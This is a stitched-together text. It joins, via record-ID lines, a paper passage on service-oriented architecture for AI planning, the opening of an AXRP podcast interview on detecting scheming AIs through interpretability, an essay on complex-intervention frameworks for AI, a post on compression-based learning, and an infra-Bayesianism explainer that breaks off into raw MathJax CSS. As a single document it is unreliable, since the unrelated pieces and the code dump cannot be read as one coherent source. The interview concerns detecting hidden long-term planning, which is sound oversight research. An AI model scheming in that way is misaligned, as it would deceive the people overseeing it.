All planning capabilities within the Endpoint class that do not have to process direct user input can be considered back-end capabilities. [Figure 4](#S5.F4 "Figure 4 ‣ Back-end capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows an example for the processing of a planning request. The following steps are performed (also highlighted in [Figure 4](#S5.F4 "Figure 4 ‣ Back-end capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. The back-end service has an established subscription to its incoming exchange topic and starts processing the message.
2. The request is received and placed in a queue. All the requests will be processed after each other (i.e., a first-in-first-out order). The results are pushed to the corresponding reply queue.
3. The response is taken from the reply queue and send to the corresponding topic.

Figure 4: Back-End Endpoint Capability
##### Front-End capabilities
All planning capabilities within the Endpoint class that have to process direct user input can be considered front-end capabilities. [Figure 5](#S5.F5 "Figure 5 ‣ Front-End capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows an example for the processing of a user request. The following steps are performed (also highlighted in [Figure 5](#S5.F5 "Figure 5 ‣ Front-End capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. The front-end capability service receives new information from user input. All information is placed at the request body of a RESTful POST message.
2. The front-end capability service calls the RESTful endpoint of a routing capability.
3. The Routing capability service process the request and sends it to a Solving capability using MOM.
4. After the system processed the request, the response or error is passed back to the routing capability. A Web Socket is used to send the asynchronous response back to the front-end.
5. The front-end receives the response or a custom-error and processes it (e.g., visualises it).

Figure 5: Front-End Endpoint Capability
#### Transforming capabilities
Since all planning capabilities in the Transforming class are identical from an architectural point of view, one pattern can be applied to all of them. [Figure 6](#S5.F6 "Figure 6 ‣ Transforming capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows a processing of a simple request by a transforming capability. The following steps are performed (also highlighted in [Figure 6](#S5.F6 "Figure 6 ‣ Transforming capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. Service A creates a new request and pushes the message to the corresponding transforming topic in MOM.
2. The transforming service has an established subscription to its incoming topic, and the message is pushed to the queue of the transforming capability.
3. The transforming service process the request and sends it to the given response topic.
4. The response is placed on service A’s capability topic in MOM.
5. Service A has an established subscription to its incoming topic and starts processing the message.

Figure 6: Transforming Capability
Since the architecture allows dynamic routing, the transforming capability is free to decide if any other transformation is necessary to reach the requested response format.
#### System Management Capabilities
System management and monitoring capabilities differ slightly at the architecture level. Only the origin of the information varies within MOM. An example of behavior of the system management capability includes a step in which the service establishes a subscription to at least one topic and another step to process a message.
#### Routing capabilities
Since there is only one capability classified as a routing capability yet, one architecture pattern can be applied. The basic functionality is similar to the one for the front-end endpoint capability. Here we focus on the global error handling that is done by the Routing capability. [Figure 7](#S5.F7 "Figure 7 ‣ Routing capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows the architecture pattern and behavior for the Routing capability. The following steps are performed (also highlighted in [Figure 7](#S5.F7 "Figure 7 ‣ Routing capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. Service A throws a custom error on processing a request. The request is handled and sent to the routing capability topic.
2. The routing service consumes the message from the topic and pushes it to the correct queue.
3. Normally the request is pushed to the in-queue (step 3.1). In this example, the message is an error, so the error-queue is responsible (step 3.2). The response or error is processed depending on the specific implementation.

Figure 7: Routing Capability
6 Implementation
-----------------
As a proof of concept, we implemented a prototype planning system whose deployment diagram is shown in [Figure 8](#S6.F8 "Figure 8 ‣ 6 Implementation ‣ Software Architecture for Next-Generation AI Planning Systems"). It consists of five planning services that provide a fully functioning planning system. Besides the general division into front-end and back-end services, the technologies used for the realisation of each service are also shown. We implemented the modelling capability using Angular111<https://angular.io> and Typescript.222<https://www.typescriptlang.org> For the back-end capabilities, we used Spring Boot333<https://spring.io/projects/spring-boot> and Kotlin.444<https://kotlinlang.org> As message-oriented middleware, we use RabbitMQ.555<https://www.rabbitmq.com>

Figure 8: Deployment Diagram of the Prototype Planning System
We used reactive programming, among other things, to be able to handle asynchronous processes in a non-blocking manner. Special attention is paid to dynamic routing to avoid the classical ping-pong process and to increase reusability. We configured RabbitMQ to give each planning service its message queue for incoming tasks. As RabbitMQ provides built-in filtering of messages in a topic (the so-called routing key), we use this feature to not compromise the extensibility of the same capability classes (e.g., HDDL parsing capability). Each queue can be configured to accept only the tasks with the appropriate routing key from the topic. This enables creation of new planning services and their integration into the running system. Each service is able to create related topics and register new queues in the messaging system.
Each planning service can be delivered as a Docker666<https://www.docker.com> image with a single command. The entire planning system can be deployed using Docker-Compose. By utilising runtime environment parameters, a predefined profile can be selected to allow the deployment of the system to different stages.
To use a minimal amount of process-relevant information in services, we use the Routing Slip pattern. This pattern allows dynamic routing of messages across multiple services. Implementing the process within a capability would cause reusability to suffer. The pattern is implemented using a call stack. After initially receiving a system request, the system’s expected endpoint (topic name and expected type) is first pushed followd by the initial service pushed by topic name and schema (or only a schema ID if a type registry exists). Typically, the Solving service is the initial capability. In it, a process is pushed into the stack in the form of sequential steps. Later, the invoked capabilities can extend the process arbitrarily by adding more process steps in the stack. Each capability removes its entry from the stack and sends the result to the next entry above in the stack.
In the following, we provide insights into the implementation of each prototype capability.
###
6.1 Managing Capability
We use the Managing capability to integrate the front-end and back-end. The capability is responsible for handling the user requests and delivering results to users. The Managing service also implements basic error-handling that uses the correlation identifier of each request. Due to the decentralisation of the message flow, we set up an error queue that transmits the corresponding status to the user when a certain planning capability step fails. Finally, the Management capability store interfaces of the available capabilities, which can be useful to other planning capabilities (see Solving capability). Currently, only an in-memory solution is integrated, which cannot be used by other capabilities. Note that a list of all available capabilities is already realised in the prototype by using the RabbitMQ API.
For communication with the Modelling capability, the Managing capability provides a RESTful interface. For connection to RabbitMQ, a corresponding exchange topic is created. To efficiently handle asynchronous system responses (i.e., results and errors), the Managing capability implements a Web Socket. Non-blocking asynchronous event streams are processed using Reactor.777<https://spring.io/reactive>
###
6.2 Parsing Capability
The Parsing capability converts planning problems specified in some syntax into programming-level objects. This service requires implementation of a `ParsingRequest` interface, which includes syntactic models of a planning domain and problem instance. To reduce the size of messages, the input should be given as `base64` strings. The input is interpreted according to the stored information in the call stack. To manage multiple syntactic forms of inputs to this service (e.g., PDDL, HDDL, SHOP), we use the Strategy pattern, which allows encapsulating a set of interchangeable algorithms individually lavieri2019:java-patterns. The basic approach towards the implementation of this service consists of converting internal data models into wrapped data models which are in turn serialised and provided as JSON messages. The conversion is accomplished by the Converting capability.
The service implementation parses PDDL planning problems. This is accomplished using the PDDL4J library Pellier2018. For other alternatives, see Section [8](#S8 "8 Discussion ‣ Software Architecture for Next-Generation AI Planning Systems").
###
6.3 Converting Capability
We use the converting capability to demonstrate the dynamic routing and independent insertion of intermediate steps, such as encoding of planning problems. The encoding step transforms a given planning problem into its final form. Such a transformation is typical for most PDDL-based planners Pellier2018.
The Converting service requires implementation of the `EncodingRequest` interface. Since our prototype completely supports planning problems specified in PDDL, we implemented the encoding of PDDL to a finite domain representation using the PDDL4J library. We created a `PddlEncodedProblem` class that follows the object structure of the library. We wrap the whole data structure by custom classes to avoid serialisation problems. This implementation choice preserves the representation of a given planning problem as a causal domain transition graph, which provides an efficient way to determine which propositions are accessible from the current state Pellier2018.
###
6.4 Solving Capability
The Solving capability requires implementation of a `SolvingRequest` interface with four arguments about the chosen planner, chosen planning language, domain, and problem instance. A user can select a planner and planning language. The service subsequently decides on its own authority which planning capabilities are to be used. That is, the `solveProblem()` method is called, which sends a request to the Parsing capability. This connection is currently preconfigured, but the ultimate objective is to search a repository for required interfaces and select an appropriate service interface. The cornerstone for this is already implemented in the Managing capability.
After receiving a reply from the Converting capability, the solving of the given planning problem begins. Since the data model may not contain a planner field for the response, the call-stack state is used at this point. Depending on the embedded planner, different types of plans can be produced (e.g., sequential plans or partially ordered plans). All results are forwarded according to the call stack.
In our case, the user can select planners with different search strategies and heuristics as implemented in the PDDL4J library. For other alternatives, see Section [8](#S8 "8 Discussion ‣ Software Architecture for Next-Generation AI Planning Systems").
###
6.5 Modelling Capability
The Modelling capability provides a Web interface that enables a user to model planning problems, select a planner, send a solving request, and inspect a found plan. It also provides login, monitoring and administration functionality, such as overview of the system and states of capabilities. In case of errors, the Modelling capability provides the stack trace and a reference to the corresponding service. The modelling of planning problems is enabled by a WEB IDE implemented using ACE888<https://ace.c9.io/> with syntax highlighting and folding provided by the WEB planner magnaguagno2017:webplanner.
7 Qualitative Assessment
-------------------------
We now provide a qualitative assessment of our approach. We analyse the usability, interoperability, and reusability of the planning architecture/prototype in comparison with a typical AI planning artefact. To visualise the comparisons of the quality data, we use radar charts. Each quality attribute is divided into several indicators each of which gets a score assigned. The score describes the general suitability of the architecture/artefact with respect to the indicator. We use {−,O,+} as a score range, where each score is correlated with a value as follows: “−”≡0.0; “O”≡0.5; and “+”≡1.0.
###
7.1 Usability
Since we are not completely interested in user interfaces, we focus on usability from a developer’s point of view. We assess usability considering three indicators: effectiveness, efficiency and user satisfaction. [Figure 9](#S7.F9 "Figure 9 ‣ 7.1 Usability ‣ 7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") shows the scores of these usability indicators. It can be observed that our approach scores equally or better than a typical planning artefact. We discuss each usability indicator next.

Figure 9: Radar Chart of Usability Indicators
##### Effectiveness
We see the effectiveness as a composition of task effectiveness, task completion and error frequency Abran2010. Since we only require existing planning artefacts to be distributed over corresponding planning capabilities, the operation and behaviour of such artefacts would not be affected. As a consequence, the task effectiveness and task completion of integrated planning artefacts are not compromised. If our planning services are distributed over a network, the probability to have a high error frequency may grow due to service unavailability. This would not be the case with typical planning artefacts. However, our planning architecture and prototype support resilience by allowing multiple service instances to run and using a messaging system. We can conclude that the general effectiveness of our approach is as high as a typical planning artefact without network dependencies. Thus, both score “+”.
##### Efficiency
We use two indicators for the efficiency. The first one is related to the first startup of a system. Since most planning artefacts have a large number of dependencies, the first startup is typically time-consuming. On the other hand, our approach is a platform solution that only requires a Web browser available in any standard computing device.
The second indicator is related to system runtime from the moment of submission of a planning request. Under the assumption of identical computing power, our approach might be slower that a typical planning artefact due to serialisation and messaging, which may require additional computing power. We should also consider that our architecture design offers the possibility of parallelisation. As a consequence, our approach and a typical planning artefact both score “+”.
##### User Satisfaction
We can assume a high degree of user satisfaction can be achieved by providing front-end capabilities.
However, due to the ability to extend capabilities, our architecture offers a significant advantage over a typical planning artefact. So, the probability of being able to deliver a desired function is correspondingly higher than with a typical planner. Since most existing planners only provide or require a command-line interface, the required knowledge and user involvement is high, and errors due to wrong interaction can occur more easily. Therefore, our approach scores “+”, while a typical planning artefact scores “O” for user satisfaction.
###
7.2 Interoperability
We assess interoperability using its four levels as indicators: organisational, semantic, syntactic and connectivity level. [Figure 10](#S7.F10 "Figure 10 ‣ 7.2 Interoperability ‣ 7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") shows the scores of the interoperability indicators. We can observe that our approach has better scores than a typical planning artefact. We discuss each indicator next.

Figure 10: Radar Chart of the Interoperability Indicators
##### Organisational
Our approach achieves organisational interoperability guaranteed by the architectural design and the clarity of purpose of each capability. On the other hand, planning artefacts typically are not associated with architecture designs and the purpose of a certain artefact and its components should be deduced either from a relevant paper or code if available. As a consequence, our approach scores “+”, and a typical planning artefact scores “O”.
##### Semantic
Due to the distribution of capabilities in our service-oriented architecture, API documentation is necessary, which we accordingly provide. Our approach gives processing guarantees by specifying the expected return type, but no mandatory validation is performed. Thus, it is theoretically possible to misinterpret objects if they are misused. This can be further reduced if service interfaces are sufficiently documented. Therefore, we assign the “O” score to our approach. In a typical planning artefact, semantics are only provided in a corresponding scientific paper, while software documentations are rarely given if at all. As a consequence, the score for a typical planning artefact is “−”.
##### Syntactic
Since syntactic interoperability requires an SOA, this indicator is not applicable to a typical planning artefact. So, the score is “−”. On the other hand, our approach is based on SOA and uses a uniform communication format (i.e., JSON). Thus, the score is “+”.
##### Connectivity
Connectivity requires decentralisation, a property uncharacteristic for typical planning artefacts. We therefore assign the “−” score. On the other hand, our approach is decentralised and supported by commonly used standards and tools. For the front-end, RESTful is used, which is based on the HTTP protocol. The choice of MOM is RabbitMQ, which is based on the TCP protocol. Both protocols are supported in most programming languages. Finally, our approach does not restrict the choice of MOM. Thus, we award the “+” score.
###
7.3 Reusability
We assess reusability as a composition of the following indicators: portability, flexibility, and understandability Cardino1997. [Figure 11](#S7.F11 "Figure 11 ‣ 7.3 Reusability ‣ 7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") shows the scores of the reusability indicators. It can be observed that our approach scores better in all indicators than a typical planning artefact. As before, we discuss each indicator next.

Figure 11: Radar Chart of Reusability Indicators
##### Portability
Portability can be determined by having as few dependencies as possible. Our planning architecture uses services that encapsulate their dependencies. Although the services may have many dependencies to external libraries, the dependencies are handled during compile-time. It is also possible to use dependency handlers (e.g., Gradle, Maven) to minimise repository dependency. During runtime, the planning services are entirely decoupled from the communication interface. Therefore, we assign the “+” score to the proposed approach.
Most of existing planning artefacts (e.g., PandaPIParser holler2021:panda) depend on operating system libraries, which may be due to the programming language used (e.g., C++) and the design of the artefact’s architecture. Rare are the planning artefacts that offer encapsulated solutions (e.g., virtual images). Even runnable artefacts are often challenging to find, so one has to handle all build dependencies. As a consequence, we assign “−” for the portability of a typical planning artefact.
##### Flexibility
Flexibility consists of two components, namely generality and modularity. Our approach offers a high degree of generality and modularity. This is mainly due to the encapsulation of planning capabilities, which can be also interpreted as individual modules. Generality is also achieved by using standard communication. Finally, planning capabilites are general enough to compose them in various ways. Therefore, we assign the “+” score.
When examining existing planning artefacts, one can notice that most of them do not use any other modular structures apart from the division into packages. Also, the generality of most of the planning artefacts as software systems is low. However, a set of utility functions is often provided, which can be used independently from the application context. This allows a minimal degree of flexibility, thus, we assign the “O” score.
##### Understandability
Understandability also consists of two components. The first one is documentation. Our approach may have detailed code documentation, however, there is no requirement that enforces such a description. Complexity is the second component. Our system’s total complexity is distributed over several services, which decreases the functional complexity of the individual services. This should be taken with a grain of salt due to the communication effort that may incur in a distributed system. Since the functional complexity outweighs the technical complexity in our context, we assign the “+” score.
For existing planning artefacts, the documentation is extremely rare. The behavior of the artefacts is typically presented in a scientific paper with no guarantee for consistency. Since typical planning artefacts bundle all their functionalities, their behavior is relatively complicated. Therefore, the comprehensibility of their individual components is impeded and worse than in a system with separate concerns. Therefore, we assign the “O” score.
8 Discussion
-------------
The collection of planning capabilities is a result of a qualitative analysis of a set of planning artefacts. This is performed in a rigorous and systematic way in which all steps and information are documented, guaranteeing its validity. While the set of analysed planning artefacts is not exhaustive, it represents a relevant sample of software tools, architectures and frameworks in which AI planning is the intervention. This ensures that the collection of planning capabilities can be generalisable to a wider population of planning artefacts. The validity and generalisability allow us to qualify our analysis and its results as trustworthy.
Instead of a decentralised approach for the design our planning architecture, we can go for the option of a centralised approach that is realised through a central capability service for pure process control. Since the central capability service would need to be always adapted when changing a planning capability or the process itself, a centralised architecture would lack usability. In theory, such a service could be set up generically to be configured via its environment, but this would not be easy to maintain during production. Besides, scalability would be endangered.
Our planning architecture is designed around the concepts of loose coupling and messaging to allow for usability, interoperability and reusability of planning capabilities. This, however, does not entail specifications of standardised interfaces for the capabilities. The reason for this lies in the current state of AI planning and interest of the AI planning community. In particular, from a standardisation point of view, the community has so far focused only on developing standard modelling languages (PDDL for classical planning and HPDL/HDDL for hierarchical planning). As a consequence, no standards are available for planning capabilities, making it extremely difficult to design standard interfaces for planning capabilities such that will support the available planning tools. These findings are reflected in the planning architecture by allowing multiple instances per planning capability. This circumvents the need to operate all planning tools for a single planning capability via one interface. In addition, it is a reasonable approach to create JSON-based interfaces for the modeling languages. This opportunity is only possible for the interfaces of the Parsing capability.
Our planning architecture and prototype are based on messaging, which involves forwarding of objects and requires their classes to be serialisable. This means that the capabilities of existing planning artefacts need to be decomposable into separate serialisable classes. Existing planning capabilities are tightly coupled software systems, making it extremely difficult, almost impossible, to extract their capabilities as separate classes. This is mainly due to fact that the AI planning community has neglected software-engineering principles and focused exclusively on the behaviour of the planning tools and algorithms. So, the lack of serialisable classes significantly complicates the integration task. It is therefore necessary to integrate every existing planning implementation into a service using a wrapper with a serialisable data structure. We tried to do this for PDDL4J, JSHOP2 Ilghami2006DocumentationFJ, KPlanning krzisch and PANDA, especially to extract the data structure for the Parsing capability. This proved also problematic, Many planners use grounding999Grounding consists of listing and instantiating all possible actions from the planning problem specification Ramoul2017. directly linked to the parsing process. In some cases, we even got in touch with the system developers to clarify the problem of data interpretation during parsing. In the end, we successfully integrated only the functionality of the PDDL4J library.
The Modelling service is implemented as a single front-end service. This makes the service complex and tightly coupled. A better approach would be to separate the front-end functionality into more discrete capabilities and decouple it from the functionality used to provide results, login and administration features.
The high scores of usability, interoperability and reusability can be justified by the fact that the planning architecture is the first planning artefact that incorporates software-engineering principles, design patterns and practices. There are also scores lower than the maximum possible. For usability, SOA may cause some disadvantages, especially in planning requests. At the same time, SOA offers many possibilities to improve usability by allowing implementation of multiple capabilities. For interoperability, our approach does not enforce equal semantic treatment of interacting capabilities. The high interoperability increases the need to have stable or standard interfaces. A correct connection to error management is necessary to be able to create meaningful error messages. For reusability, the currently used JavaDocs might not be sufficient as documentation for such a platform planning architecture. Detailed documentation of each planning capability and corresponding interfaces might be necessary..
In addition to usability, interoperability and reusability, our approach has the advantage of flexibility. The planning architecture can be easily extended with other planning capabilities and also it can support any data model provided its serialisability. So, the proposed approach can be seen as an ecosystem of existing planning capabilities and incubator of new planning services, having the potential to avoid many development and integration problems and to save time and effort. These advantages would become even more apparent when the system gets connected to a real-world application.
9 Conclusions
--------------
We put a software architecture at the core of the ability to build, sustain and foster the use of AI planning systems. We collected a set of planning capabilities that we classified from an operational and technical perspective. These two classifications provide initial support for designers and engineers of AI planning systems by allowing them to quickly understand the objectives, features and properties of the numerous planning capabilities. Upon these capabilities, we designed a service-oriented planning architecture that meets the requirements of usability, interoperability and reusability. The architecture design incorporates appropriate software-engineering principles and design patterns.
The developed system prototype is used to demonstrate the potential for rapid prototyping by leveraging the flexibility of the planning architecture, but also the possibility to integrate existing planning tools when their complex internals allow for it. We showed that our proposed approach has qualitative attributes that go beyond those of typical AI planning artefacts. While our planning architecture represents an initial effort and the prototype offers only limited capabilities, we believe they make a significant step towards bringing closer software architecture and AI planning. |
0bcde9c8-a73c-4724-9faf-2451beb8cf69 | trentmkelly/LessWrong-43k | LessWrong | AXRP Episode 38.5 - Adrià Garriga-Alonso on Detecting AI Scheming
YouTube link
Suppose we’re worried about AIs engaging in long-term plans that they don’t tell us about. If we were to peek inside their brains, what should we look for to check whether this was happening? In this episode Adrià Garriga-Alonso talks about his work trying to answer this question.
Topics we discuss:
* The Alignment Workshop
* How to detect scheming AIs
* Sokoban-solving networks taking time to think
* Model organisms of long-term planning
* How and why to study planning in networks
Daniel Filan (00:09): Hello, everyone. This is one of a series of short interviews that I’ve been conducting at the Bay Area Alignment Workshop, which is run by FAR.AI. Links to what we’re discussing, as usual, are in the description. A transcript is, as usual, available at axrp.net, and as usual, if you want to support the podcast, you can do so at patreon.com/axrpodcast. Let’s continue to the interview. Adrià, thanks for chatting with me.
Adrià Garriga-Alonso (00:30): Thank you for having me, Daniel.
Daniel Filan (00:31): For people who aren’t familiar with you, can you say a little bit about yourself, what you do?
Adrià Garriga-Alonso (00:35): Yeah. My name is Adrià. I work at FAR.AI. I have been doing machine learning research focused on safety for the last three years and before that, I did a PhD in machine learning. I’ve been thinking about this for a while, and my current work is on mechanistic interpretability and specifically how we can use interpretability to detect what a neural network wants and what it might be scheming towards.
The Alignment Workshop
Daniel Filan (01:04): Before I get into that too much, we’re currently at this alignment workshop being run by FAR.AI. How are you finding the workshop?
Adrià Garriga-Alonso (01:10): It’s really great. I have had lots of stimulating conversations and actually, I think my research will change at least a little bit based on this. I’m way less sure of what I am doing now. I still think it makes sense, bu |
90f76f09-6b53-45b7-92b7-9a1a2baced3b | trentmkelly/LessWrong-43k | LessWrong | Embracing complexity when developing and evaluating AI responsibly
Complex Intervention Development and Evaluation Framework: A Blueprint for Ethical and Responsible AI Development and Evaluation
The rapid evolution of artificial intelligence (AI) presents significant opportunities, but it also raises serious concerns about its societal impact. Ensuring that AI systems are fair, responsible, and safe is more critical than ever, as these technologies become embedded in various aspects of our lives. In this post, I’ll explore how a framework used for developing and evaluating complex interventions (1:2) — common in public health and social sciences—can offer a structured approach for navigating the ethical challenges of AI development.
I used to believe that by applying first principles and establishing a clear set of rules, particularly in well-defined environments like games, we could guarantee AI safety. However, when I encountered large language models (LLMs) that interact with vast bodies of human knowledge, I realised how limited this view was. These models function in the "wild" world characterised by dynamic rules, fluid social contexts, and hard to predict human behaviour and interactions. This complexity calls for approaches that embrace uncertainty and acknowledge the messiness of real-world environments. This realisation led me to draw from methods used in social science and public health, particularly those related to complex interventions designed to influence behaviour and create change (1;2).
Some AI systems, such as Gemini, ChatGPT, Llama, much like complex interventions, are developed to interact with humans as agents and potentially influence human behaviour in dynamic, real-world contexts. First principles alone are insufficient to ensure fairness and safety in these systems. Foreseeing and eliminating bias in such a complex setting poses a challenge. It is inefficient to pinpoint biases in a complex system in a top down manner. Instead, we need rigorous, evidence-based approaches that place stakeholder |
633b2189-cfad-4ec4-9e0e-f28114613ef1 | trentmkelly/LessWrong-43k | LessWrong | My (Mis)Adventures With Algorithmic Machine Learning
Introduction
This was originally posted here.
I've been researching, for quite some time, the prospect of machine learning on a wider variety of data types than normally considered; things other than tables of numbers and categories. In particular, I want to do ML for program and proof synthesis which requires, at the very least, learning the structures of trees or graphs which don't come from a differentiable domain. Normal ML algorithms can't handle these; though some recent methods, such as graph neural networks and transformers, can be adapted to this domain with some promising results. However, these methods still rely on differentiation. Is this really required? Are we forever doomed to map all our data onto a differentiable domain if we want to learn with it?
An alternative approach that has been bandied about for a while is the utilization of compression. It's not hard to find articles and talks about the relationship between compression and prediction. If you have a good predictor, then you can compress a sequence into a seed for that predictor and decompress by running said predictor. Going the other way is harder, but, broadly speaking, if you have a sequence that you want to make a prediction on and a good compressor, then whichever addition increases the compressed size the least should be considered the likeliest prediction. This approach is quite broad, applying to any information which can be represented on a computer and not requiring any assumptions whatsoever about the structure of our data beyond that. We could use this idea to, for example, fill in gaps in graphs, trees, sets of input-output pairs, etc.
It's important to understand what's actually required here. We don't actually need to compress our training data; we only need a way to estimate the change in minimal-compression-size as we add a prediction. This minimal-compression-size is called the Kolmogorov Complexity, denoted K(X). The minimal-compression-size of a program which outputs |
2768844f-f488-4a2a-a851-f0c1de9bf3db | StampyAI/alignment-research-dataset/lesswrong | LessWrong | Performance guarantees in classical learning theory and infra-Bayesianism
Introduction
============
I wrote this post during my [SERI MATS](https://www.serimats.org/) scholarship, explaining the part of [infra-Bayesianism](https://www.lesswrong.com/posts/zB4f7QqKhBHa5b37a/introduction-to-the-infra-bayesianism-sequence) that I understood the most deeply. Compared to some [previous distillations](https://www.alignmentforum.org/posts/Zi7nmuSmBFbQWgFBa/infra-bayesianism-unwrapped), I don't go deeply into the mathematical machinery built around infra-Bayesianism, instead I try to evaluate what results infra-Bayesianism produced compared to classical learning theory in the topic of performance guarantees in general environments, which was the main motivation behind the development of infra-Bayesianism.
The theorems appearing in the post are not original to me, and can be found in either the broader academic literature (concerning classical learning theory) or Vanessa's writings (concerning infra-Bayesianism). I included proofs in the text when I found them useful for general understanding, and moved them to the Appendix when I thought them simple and important enough to write down, but not interesting enough to break the flow of text with them. The later examples investigating the limits of infra-Bayesian learning are my own.
My conclusion is that the general performance guarantees we can currently prove about infra-Bayesian learning agents are pretty weak, but it seems plausible that the theory gets us closer to tackling the question.
For my general thoughts and doubts about infra-Bayesianism, see my other, less technical post: [A mostly critical review of infra-Bayesianism](https://www.lesswrong.com/posts/StkjjQyKwg7hZjcGB/a-mostly-critical-review-of-infra-bayesianism).
Classical reinforcement learning
================================
Before we go into the infra-Bayesian explainer, or before we could even really state what the motivating problem of non-realizability is, it's important to get at least a superficial overview of classical reinforcement learning theory that is studied in academia since a long time. My main source for this was the book [Bandit Algorithms](https://tor-lattimore.com/downloads/book/book.pdf) by Lattimore and Szepesvári.
In a simple model of reinforcement learning, the agent is placed in an environment, and on every turn, the agent chooses an action from its finite action set A.mjx-chtml {display: inline-block; line-height: 0; text-indent: 0; text-align: left; text-transform: none; font-style: normal; font-weight: normal; font-size: 100%; font-size-adjust: none; letter-spacing: normal; word-wrap: normal; word-spacing: normal; white-space: nowrap; float: none; direction: ltr; max-width: none; max-height: none; min-width: 0; min-height: 0; border: 0; margin: 0; padding: 1px 0}
.MJXc-display {display: block; text-align: center; margin: 1em 0; padding: 0}
.mjx-chtml[tabindex]:focus, body :focus .mjx-chtml[tabindex] {display: inline-table}
.mjx-full-width {text-align: center; display: table-cell!important; width: 10000em}
.mjx-math {display: inline-block; border-collapse: separate; border-spacing: 0}
.mjx-math \* {display: inline-block; -webkit-box-sizing: content-box!important; -moz-box-sizing: content-box!important; box-sizing: content-box!important; text-align: left}
.mjx-numerator {display: block; text-align: center}
.mjx-denominator {display: block; text-align: center}
.MJXc-stacked {height: 0; position: relative}
.MJXc-stacked > \* {position: absolute}
.MJXc-bevelled > \* {display: inline-block}
.mjx-stack {display: inline-block}
.mjx-op {display: block}
.mjx-under {display: table-cell}
.mjx-over {display: block}
.mjx-over > \* {padding-left: 0px!important; padding-right: 0px!important}
.mjx-under > \* {padding-left: 0px!important; padding-right: 0px!important}
.mjx-stack > .mjx-sup {display: block}
.mjx-stack > .mjx-sub {display: block}
.mjx-prestack > .mjx-presup {display: block}
.mjx-prestack > .mjx-presub {display: block}
.mjx-delim-h > .mjx-char {display: inline-block}
.mjx-surd {vertical-align: top}
.mjx-surd + .mjx-box {display: inline-flex}
.mjx-mphantom \* {visibility: hidden}
.mjx-merror {background-color: #FFFF88; color: #CC0000; border: 1px solid #CC0000; padding: 2px 3px; font-style: normal; font-size: 90%}
.mjx-annotation-xml {line-height: normal}
.mjx-menclose > svg {fill: none; stroke: currentColor; overflow: visible}
.mjx-mtr {display: table-row}
.mjx-mlabeledtr {display: table-row}
.mjx-mtd {display: table-cell; text-align: center}
.mjx-label {display: table-row}
.mjx-box {display: inline-block}
.mjx-block {display: block}
.mjx-span {display: inline}
.mjx-char {display: block; white-space: pre}
.mjx-itable {display: inline-table; width: auto}
.mjx-row {display: table-row}
.mjx-cell {display: table-cell}
.mjx-table {display: table; width: 100%}
.mjx-line {display: block; height: 0}
.mjx-strut {width: 0; padding-top: 1em}
.mjx-vsize {width: 0}
.MJXc-space1 {margin-left: .167em}
.MJXc-space2 {margin-left: .222em}
.MJXc-space3 {margin-left: .278em}
.mjx-test.mjx-test-display {display: table!important}
.mjx-test.mjx-test-inline {display: inline!important; margin-right: -1px}
.mjx-test.mjx-test-default {display: block!important; clear: both}
.mjx-ex-box {display: inline-block!important; position: absolute; overflow: hidden; min-height: 0; max-height: none; padding: 0; border: 0; margin: 0; width: 1px; height: 60ex}
.mjx-test-inline .mjx-left-box {display: inline-block; width: 0; float: left}
.mjx-test-inline .mjx-right-box {display: inline-block; width: 0; float: right}
.mjx-test-display .mjx-right-box {display: table-cell!important; width: 10000em!important; min-width: 0; max-width: none; padding: 0; border: 0; margin: 0}
.MJXc-TeX-unknown-R {font-family: monospace; font-style: normal; font-weight: normal}
.MJXc-TeX-unknown-I {font-family: monospace; font-style: italic; font-weight: normal}
.MJXc-TeX-unknown-B {font-family: monospace; font-style: normal; font-weight: bold}
.MJXc-TeX-unknown-BI {font-family: monospace; font-style: italic; font-weight: bold}
.MJXc-TeX-ams-R {font-family: MJXc-TeX-ams-R,MJXc-TeX-ams-Rw}
.MJXc-TeX-cal-B {font-family: MJXc-TeX-cal-B,MJXc-TeX-cal-Bx,MJXc-TeX-cal-Bw}
.MJXc-TeX-frak-R {font-family: MJXc-TeX-frak-R,MJXc-TeX-frak-Rw}
.MJXc-TeX-frak-B {font-family: MJXc-TeX-frak-B,MJXc-TeX-frak-Bx,MJXc-TeX-frak-Bw}
.MJXc-TeX-math-BI {font-family: MJXc-TeX-math-BI,MJXc-TeX-math-BIx,MJXc-TeX-math-BIw}
.MJXc-TeX-sans-R {font-family: MJXc-TeX-sans-R,MJXc-TeX-sans-Rw}
.MJXc-TeX-sans-B {font-family: MJXc-TeX-sans-B,MJXc-TeX-sans-Bx,MJXc-TeX-sans-Bw}
.MJXc-TeX-sans-I {font-family: MJXc-TeX-sans-I,MJXc-TeX-sans-Ix,MJXc-TeX-sans-Iw}
.MJXc-TeX-script-R {font-family: MJXc-TeX-script-R,MJXc-TeX-script-Rw}
.MJXc-TeX-type-R {font-family: MJXc-TeX-type-R,MJXc-TeX-type-Rw}
.MJXc-TeX-cal-R {font-family: MJXc-TeX-cal-R,MJXc-TeX-cal-Rw}
.MJXc-TeX-main-B {font-family: MJXc-TeX-main-B,MJXc-TeX-main-Bx,MJXc-TeX-main-Bw}
.MJXc-TeX-main-I {font-family: MJXc-TeX-main-I,MJXc-TeX-main-Ix,MJXc-TeX-main-Iw}
.MJXc-TeX-main-R {font-family: MJXc-TeX-main-R,MJXc-TeX-main-Rw}
.MJXc-TeX-math-I {font-family: MJXc-TeX-math-I,MJXc-TeX-math-Ix,MJXc-TeX-math-Iw}
.MJXc-TeX-size1-R {font-family: MJXc-TeX-size1-R,MJXc-TeX-size1-Rw}
